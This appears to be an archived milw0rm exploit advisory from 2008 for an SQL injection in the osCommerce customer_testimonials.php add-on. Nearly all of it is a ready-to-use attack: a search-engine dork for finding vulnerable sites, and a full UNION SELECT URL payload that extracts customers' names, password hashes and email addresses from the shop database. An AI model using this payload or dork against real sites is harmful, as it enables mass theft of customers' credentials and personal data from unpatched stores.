26 lines
827 B
Text
Executable file
26 lines
827 B
Text
Executable file
#########################################################
|
|
##
|
|
## osCommerce SQL Injection (customer_testimonials.php)
|
|
##
|
|
##
|
|
## Author: it's my
|
|
##
|
|
## Home page: http://www.antichat.ru
|
|
##
|
|
#########################################################
|
|
##
|
|
## Dork: inurl:"customer_testimonials.php"
|
|
##
|
|
#########################################################
|
|
|
|
Exploit:
|
|
|
|
http://site.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
|
|
|
|
#########################################################
|
|
## it's my sick world =/ #### www.antichat.ru
|
|
#########################################################
|
|
|
|
source: http://addons.oscommerce.com/info/5477
|
|
|
|
# milw0rm.com [2008-02-07]
|